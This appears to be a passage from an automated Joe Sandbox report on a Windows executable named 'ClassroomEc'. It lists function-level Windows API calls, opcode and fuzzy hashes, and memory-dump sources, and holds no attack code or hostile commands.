                                                                                                                                                      • Instruction ID: 60ea8bcecf6609aba63e33e5c9b9ecdc886480815333f8a543349f6415205f40
                                                                                                                                                      • Opcode Fuzzy Hash: 83591acb39805b45cadf740831f139ff59013fcdbe6ed1d7997e73483f31122d
                                                                                                                                                      • Instruction Fuzzy Hash: AC01CD70D01109EFCB04EFA8DA45AAEBBB0FF88304F10C5A9D40977291D7711E40DB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,80000000,00000000,?,00A86886,00000000,?,?,00A86886,?,80000000,?,?,?), ref: 00A866F2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      • Opcode ID: 3473bfe9268a8525eacbe868592a0b090ba8d14fbe7a9e1a198aa9afc050a3e8
                                                                                                                                                      • Instruction ID: 885e7fd5a2db3284a64e79bd0fe8a62fe58bf588ccea520a7f48d0f21d645564
                                                                                                                                                      • Opcode Fuzzy Hash: 3473bfe9268a8525eacbe868592a0b090ba8d14fbe7a9e1a198aa9afc050a3e8
                                                                                                                                                      • Instruction Fuzzy Hash: 2EF05E75604209FFDB04DFA4D841EAF77F9FB89310F104258F9159B280DA31AE11EBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A86AB8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                      • Opcode ID: f6519598a6872d9f062f7a76695d00a16538effdd3ae1d10273156a89bb285b8
                                                                                                                                                      • Instruction ID: 9e03f84e6c1d02921e96af74f46cb6548fdefd5d76f4ef2ff7b3c100c4b688aa
                                                                                                                                                      • Opcode Fuzzy Hash: f6519598a6872d9f062f7a76695d00a16538effdd3ae1d10273156a89bb285b8
                                                                                                                                                      • Instruction Fuzzy Hash: EDF0FFB5A04208FFCB04DFD8D884A9EBBB9AB48300F10C199F8189B341D731A645CF61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: codecvt
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3662085145-0
                                                                                                                                                      • Opcode ID: 11022d4cfc266af2f5d3f29bbdd2fb7bf31ddfbc4f0a8f88ef132e2aa352b797
                                                                                                                                                      • Instruction ID: 886d6ace8dc041ad745272ca453134cf43b8cc54067adf82e3733232fb3f8f3d
                                                                                                                                                      • Opcode Fuzzy Hash: 11022d4cfc266af2f5d3f29bbdd2fb7bf31ddfbc4f0a8f88ef132e2aa352b797
                                                                                                                                                      • Instruction Fuzzy Hash: 5901B67490020CEFCB04DFA8C545AADBBB5BB48351F10C599D8096B351D770AE80DB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: codecvt
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3662085145-0
                                                                                                                                                      • Opcode ID: 0877466f9f167c7c3e1c31dec033a9161ed42242a87bf19012e482f4da869ad0
                                                                                                                                                      • Instruction ID: 0ab95ac8dcdb7f44adbd80e67330536b8c9b68e8a06a4dfe282163565f78ae4f
                                                                                                                                                      • Opcode Fuzzy Hash: 0877466f9f167c7c3e1c31dec033a9161ed42242a87bf19012e482f4da869ad0
                                                                                                                                                      • Instruction Fuzzy Hash: 1F01C474A44208EFCB04DFA8C545AADBBF0FB48344F108699E809AB745D771AE81DF84
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • ReadFile.KERNELBASE(?,00000000,?,00000000,00000000), ref: 00A86914
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      • Opcode ID: d82d55ef0f7409c25b7961e6557008c4a7c2d1ae165a8961544339be2604f76c
                                                                                                                                                      • Instruction ID: 277b64387e977a69ad3a89ba2debd414f46ae359531b9f8f8e914736b31a63dc
                                                                                                                                                      • Opcode Fuzzy Hash: d82d55ef0f7409c25b7961e6557008c4a7c2d1ae165a8961544339be2604f76c
                                                                                                                                                      • Instruction Fuzzy Hash: 29F01CB9904248BFCB00DFD8D845FDEBBB8AB58300F008199F90497341D631A615CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A88FF0: ??2@YAPAXI@Z.MSVCRT ref: 00A89019
                                                                                                                                                      • _wmemmove.LIBCMTD ref: 00A892EC
                                                                                                                                                        • Part of subcall function 00A81470: memcpy.MSVCRT ref: 00A81481
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@_wmemmovememcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2841112568-0
                                                                                                                                                      • Opcode ID: 19fa03c322f7b59946df5d45f3ce540ef27cd209b2abb44b35da00296593f5aa
                                                                                                                                                      • Instruction ID: a36a3ca5fdbbdcce21189c7bfecdc944904b456c70de15ccef50f49aa373d02b
                                                                                                                                                      • Opcode Fuzzy Hash: 19fa03c322f7b59946df5d45f3ce540ef27cd209b2abb44b35da00296593f5aa
                                                                                                                                                      • Instruction Fuzzy Hash: 3DF0EDB5604108FFC704DF88D981C5AB7F9EF89354B108298FC089B312DA31EE10DB94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00A81522), ref: 00A89F29
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocString
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2525500382-0
                                                                                                                                                      • Opcode ID: 8bd21f332e2bf99af45dec59c6abb6a933e69aae66585f47fd802d9906089a4d
                                                                                                                                                      • Instruction ID: 055deb2813c89927c3c48bfca5cfb7758c0fe6f7e8349371d9b281168bf9fe7d
                                                                                                                                                      • Opcode Fuzzy Hash: 8bd21f332e2bf99af45dec59c6abb6a933e69aae66585f47fd802d9906089a4d
                                                                                                                                                      • Instruction Fuzzy Hash: A4F09234210349ABDB04CF54C490B66BB65EB49364F24D259E94DCF350D676ED82CB85
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,?,00A86A77,00000000,00000000,?,?,?,00A733A6,?,?), ref: 00A86A49
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileTime
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1425588814-0
                                                                                                                                                      • Opcode ID: 03b765926853e4316337b1d400194b44341cbad5b92a9b02bbeb64ca65696277
                                                                                                                                                      • Instruction ID: 92bebe390185b8ef8838f0a5e4202316ac412cffe9ad3e72d8bd670a1b83fb41
                                                                                                                                                      • Opcode Fuzzy Hash: 03b765926853e4316337b1d400194b44341cbad5b92a9b02bbeb64ca65696277
                                                                                                                                                      • Instruction Fuzzy Hash: F0E0ECB6A04108BB8B04DFD8EC45C9B77ACAB5C300B10825DF909C7300DA32EA10CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 00A71381
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::ios_base::clear
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1443086396-0
                                                                                                                                                      • Opcode ID: b3493e062fb2f0b29b7aba0934e9481bbdd5119705f384922eea4d1d880fe996
                                                                                                                                                      • Instruction ID: 5c34db621ce9c2888155c81cee72c5873ab8624cc3fae705ad509309b8b3f6a1
                                                                                                                                                      • Opcode Fuzzy Hash: b3493e062fb2f0b29b7aba0934e9481bbdd5119705f384922eea4d1d880fe996
                                                                                                                                                      • Instruction Fuzzy Hash: E6C0127190410CBB4704DF8CD90195EB7AC9B14300F004169B90997301C5315A1097B9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 829399097-0
                                                                                                                                                      • Opcode ID: 68d04c9b79b621abe1b1555c2193feb214f9517246706198fa3181732c31d353
                                                                                                                                                      • Instruction ID: 6de26c61aa5a6329f4525358998cc84c5a14f96d8095d39cf791194d69b125c4
                                                                                                                                                      • Opcode Fuzzy Hash: 68d04c9b79b621abe1b1555c2193feb214f9517246706198fa3181732c31d353
                                                                                                                                                      • Instruction Fuzzy Hash: BF0152B2E40209ABDF04EFA4DD467AE77B4AF00340F01C468E80EAB292DB755B45DB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                      • Opcode ID: 1dd495598ebddd9998bd3669da28e97c01af639729b23818e2c0219baa4f5057
                                                                                                                                                      • Instruction ID: ef8ae37a1d3508cde668f2b70f432a7f407fb8718adc2b8154ad813a00a71e9f
                                                                                                                                                      • Opcode Fuzzy Hash: 1dd495598ebddd9998bd3669da28e97c01af639729b23818e2c0219baa4f5057
                                                                                                                                                      • Instruction Fuzzy Hash: 0DF0FEB5A05208AFCB08DF58D541A5DFFF4EF48350F1081A9EC499B345D631EE51CB94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00A7650B
                                                                                                                                                        • Part of subcall function 00A765A0: _DebugHeapAllocator.LIBCPMTD ref: 00A765AE
                                                                                                                                                        • Part of subcall function 00A765A0: _DebugHeapAllocator.LIBCPMTD ref: 00A765C0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeap$??2@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1120120259-0
                                                                                                                                                      • Opcode ID: 939666753f753fe99277cc5e9726e4c1763854a6552f2298c94dd3625c1625ef
                                                                                                                                                      • Instruction ID: c9c827439e2fcf87357aaca86593a331fd1c05be820a18a18df979e139763450
                                                                                                                                                      • Opcode Fuzzy Hash: 939666753f753fe99277cc5e9726e4c1763854a6552f2298c94dd3625c1625ef
                                                                                                                                                      • Instruction Fuzzy Hash: 5FE0C9F1D14608AFDF04EFA4D946B9EBBB4AB44300F50C1A9E5056B280EA705A54EF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                      • Opcode ID: 917d4162340fb44f94f007ac9e731a54d4517bc9d05544b15a4b49cae7dede00
                                                                                                                                                      • Instruction ID: 8961e9e15d7f9007722a44dc605c943d2cf79bbe2ecfaa07c91fcfa463026592
                                                                                                                                                      • Opcode Fuzzy Hash: 917d4162340fb44f94f007ac9e731a54d4517bc9d05544b15a4b49cae7dede00
                                                                                                                                                      • Instruction Fuzzy Hash: 42E01AB4D04208EFCB00DF98D441A8DBBF4AB18300F1041A5E808A7340E230AA94CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 00A847FA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                      • Opcode ID: 938e7327eb311c2541f3a6d835b598872e222a7a64c9911f363a4f531d18fcd4
                                                                                                                                                      • Instruction ID: d95c4f68a305278e490706f0a2e870eacb1070560d838b5363e1ae3094c60d88
                                                                                                                                                      • Opcode Fuzzy Hash: 938e7327eb311c2541f3a6d835b598872e222a7a64c9911f363a4f531d18fcd4
                                                                                                                                                      • Instruction Fuzzy Hash: 77D0123064420ABAE700AA94EC45BA63698970CB95F104020FB0D890C0D6B0959047A4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A84826
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                      • Opcode ID: 5a2f6de4d853c62dd1f380824a8ec425825ad634c4143b6530dc9ca752649419
                                                                                                                                                      • Instruction ID: 67c8db1908eb4f9605b6a217e7020487fb95d5d0f6e5938af5da603f2f1d4143
                                                                                                                                                      • Opcode Fuzzy Hash: 5a2f6de4d853c62dd1f380824a8ec425825ad634c4143b6530dc9ca752649419
                                                                                                                                                      • Instruction Fuzzy Hash: 68C0803054070DFBDB10ABD4DC45BE6375C9718711F108011FA4D59080C6709584C7D0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • wvsprintfW.USER32(?,?,?), ref: 00A7B32D
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00A7B33D
                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,?,?,00000000,00000000), ref: 00A7B36C
                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00A7B393
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00A7B3A8
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00A7B3BB
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00A7B3DC
                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 00A7B404
                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 00A7B437
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00A7B45F
                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00A7B46E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 829399097-0
                                                                                                                                                      • Opcode ID: f6b1a855b850130b39b04fc33bd8fe745b7464a9f04c9d6cf27f5a54f1c389c7
                                                                                                                                                      • Instruction ID: 8dca0c594ecd5419a6aa91075661336f564e058e3ba13609e5d4a2e0632f5431
                                                                                                                                                      • Opcode Fuzzy Hash: f6b1a855b850130b39b04fc33bd8fe745b7464a9f04c9d6cf27f5a54f1c389c7
                                                                                                                                                      • Instruction Fuzzy Hash: 9A41FDB5A0021CABDB64DF94DC45BDAB7B8FF48300F10C1A9E54996251DF349A86CFE1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.MSVCRT ref: 00A79FE0
                                                                                                                                                      • SystemParametersInfoW.USER32(00000029,00000000,000001F4,00000000), ref: 00A79FFF
                                                                                                                                                      • GetDC.USER32(00000000), ref: 00A7A00B
                                                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 00A7A020
                                                                                                                                                      • MulDiv.KERNEL32(?,00000048,00000000), ref: 00A7A030
                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00A7A047
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00A7A077
                                                                                                                                                      • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00A7A0AD
